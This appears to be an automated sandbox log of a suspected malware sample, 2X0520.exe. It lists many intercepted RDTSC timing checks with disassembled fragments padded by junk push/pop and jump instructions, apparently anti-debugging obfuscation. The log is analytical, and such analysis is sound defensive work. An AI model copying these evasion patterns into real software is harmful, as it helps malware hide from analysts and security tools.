Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AD14AC second address: AD14B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AD14B0 second address: AD14BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F3838D0CF46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE2C3 second address: ADE2C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE2C9 second address: ADE2E5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F3838D0CF46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3838D0CF52h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE2E5 second address: ADE338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F3838E06D1Dh 0x0000000a jl 00007F3838E06D16h 0x00000010 popad 0x00000011 push esi 0x00000012 jmp 00007F3838E06D22h 0x00000017 jg 00007F3838E06D16h 0x0000001d pop esi 0x0000001e pop edx 0x0000001f pop eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push edx 0x00000023 jmp 00007F3838E06D29h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE338 second address: ADE350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jg 00007F3838D0CF53h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE350 second address: ADE362 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3838E06D1Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE362 second address: ADE368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE16F second address: ADE189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3838E06D25h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: ADE189 second address: ADE1A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3838D0CF54h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE5ECF second address: AE5ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE5ED7 second address: AE5F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3838D0CF4Bh 0x00000009 popad 0x0000000a jmp 00007F3838D0CF55h 0x0000000f popad 0x00000010 push eax 0x00000011 jc 00007F3838D0CF53h 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F3838D0CF4Bh 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE5F15 second address: AE5F19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE5F19 second address: AE5F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE47F8 second address: AE4801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE4801 second address: AE4805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE5BE7 second address: AE5C1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F3838E06D28h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AE833C second address: AE8351 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3838D0CF4Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AF92FC second address: AF9311 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3838E06D16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F3838E06D1Bh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AF9311 second address: AF9317 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AF917A second address: AF917F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: AF917F second address: AF9185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1D7AD second address: B1D7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1D7B1 second address: B1D7B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1D7B5 second address: B1D7EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3838E06D26h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d jmp 00007F3838E06D24h 0x00000012 pushad 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1DABC second address: B1DAD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3838D0CF53h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1DAD5 second address: B1DAE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F3838E06D16h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1DAE1 second address: B1DB00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF56h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1DC54 second address: B1DC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3838E06D16h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1DC5E second address: B1DC8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F3838D0CF51h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1E1AC second address: B1E1B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1E1B0 second address: B1E1BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1E1BC second address: B1E1C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1FDD5 second address: B1FDF5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jnl 00007F3838D0CF46h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 pop eax 0x00000015 popad 0x00000016 jmp 00007F3838D0CF4Ah 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1FDF5 second address: B1FDFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1FDFD second address: B1FE01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1FE01 second address: B1FE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3838E06D1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1FE17 second address: B1FE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B1FE1B second address: B1FE21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B226F0 second address: B226F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B23F3C second address: B23F42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B23F42 second address: B23F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B23F46 second address: B23F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jo 00007F3838E06D16h 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B2750C second address: B27519 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: B27519 second address: B27548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D1Eh 0x00000007 jnc 00007F3838E06D16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnl 00007F3838E06D1Eh 0x00000015 pushad 0x00000016 jne 00007F3838E06D16h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00833 second address: 4F00839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00839 second address: 4F00850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a call 00007F3838E06D1Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00850 second address: 4F008A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov bl, 88h 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 jmp 00007F3838D0CF4Eh 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F3838D0CF57h 0x00000018 or ah, FFFFFFEEh 0x0000001b jmp 00007F3838D0CF59h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F008A0 second address: 4F008BC instructions: 0x00000000 rdtsc 0x00000002 mov cx, C277h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F3838E06D1Ch 0x0000000d popad 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F008BC second address: 4F008C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F008C0 second address: 4F008DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F008DD second address: 4F0095C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 12A94F99h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-04h] 0x0000000e pushad 0x0000000f push ecx 0x00000010 jmp 00007F3838D0CF51h 0x00000015 pop ecx 0x00000016 jmp 00007F3838D0CF51h 0x0000001b popad 0x0000001c nop 0x0000001d pushad 0x0000001e mov cx, EAB3h 0x00000022 call 00007F3838D0CF58h 0x00000027 mov cx, BE91h 0x0000002b pop eax 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f call 00007F3838D0CF4Ah 0x00000034 pop ebx 0x00000035 popad 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F3838D0CF56h 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F009F9 second address: 4F00A20 instructions: 0x00000000 rdtsc 0x00000002 mov esi, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 je 00007F3838E06D80h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3838E06D28h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A20 second address: 4F00A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3838D0CF4Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A5C second address: 4F00A60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A60 second address: 4F00A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A66 second address: 4F00A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 mov cl, D5h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, esi 0x0000000c jmp 00007F3838E06D21h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A8A second address: 4F00A8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A8E second address: 4F00A92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A92 second address: 4F00A98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00A98 second address: 4F00ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838E06D22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, ebx 0x0000000f call 00007F3838E06D29h 0x00000014 pop ecx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00ACF second address: 4F00AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4F00AD4 second address: 4EF0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F3838E06D1Ah 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d retn 0004h 0x00000010 nop 0x00000011 cmp eax, 00000000h 0x00000014 setne al 0x00000017 xor ebx, ebx 0x00000019 test al, 01h 0x0000001b jne 00007F3838E06D17h 0x0000001d sub esp, 04h 0x00000020 mov dword ptr [esp], 0000000Dh 0x00000027 call 00007F383D4961D7h 0x0000002c mov edi, edi 0x0000002e jmp 00007F3838E06D26h 0x00000033 xchg eax, ebp 0x00000034 pushad 0x00000035 mov ax, 212Dh 0x00000039 movzx eax, bx 0x0000003c popad 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F3838E06D1Eh 0x00000047 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0035 second address: 4EF003B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF003B second address: 4EF0041 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0041 second address: 4EF0045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0045 second address: 4EF0049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0049 second address: 4EF0064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3838D0CF4Eh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0064 second address: 4EF0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0068 second address: 4EF006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF01A1 second address: 4EF01A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF01A7 second address: 4EF01D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F3838D0CF4Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF01D2 second address: 4EF01D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0200 second address: 4EF02EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 sub ebx, ebx 0x00000007 jmp 00007F3838D0CF55h 0x0000000c sub edi, edi 0x0000000e pushad 0x0000000f movsx edi, ax 0x00000012 pushfd 0x00000013 jmp 00007F3838D0CF56h 0x00000018 jmp 00007F3838D0CF55h 0x0000001d popfd 0x0000001e popad 0x0000001f inc ebx 0x00000020 pushad 0x00000021 movzx ecx, di 0x00000024 popad 0x00000025 test al, al 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3838D0CF50h 0x0000002e jmp 00007F3838D0CF55h 0x00000033 popfd 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007F3838D0CF4Eh 0x0000003b add esi, 29E06EF8h 0x00000041 jmp 00007F3838D0CF4Bh 0x00000046 popfd 0x00000047 push eax 0x00000048 pop edx 0x00000049 popad 0x0000004a popad 0x0000004b je 00007F3838D0D0E2h 0x00000051 jmp 00007F3838D0CF52h 0x00000056 lea ecx, dword ptr [ebp-14h] 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F3838D0CF4Dh 0x00000062 and ax, 1646h 0x00000067 jmp 00007F3838D0CF51h 0x0000006c popfd 0x0000006d mov bh, cl 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF02EC second address: 4EF02F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF02F2 second address: 4EF02F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF02F6 second address: 4EF030F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-14h], edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3838E06D1Ah 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF030F second address: 4EF031E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3838D0CF4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	RDTSC instruction interceptor: First address: 4EF0404 second address: 4EF0477 instructions: 0x00000000 rdtsc 0x00000002 call 00007F3838E06D25h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b cmp dword ptr [ebp-14h], edi 0x0000000e jmp 00007F3838E06D27h 0x00000013 jne 00007F38A9974D78h 0x00000019 pushad 0x0000001a mov si, BCFBh 0x0000001e mov dx, cx 0x00000021 popad 0x00000022 mov ebx, dword ptr [ebp+08h] 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007F3838E06D26h 0x0000002e or eax, 1C120B78h 0x00000034 jmp 00007F3838E06D1Bh 0x00000039 popfd 0x0000003a rdtsc
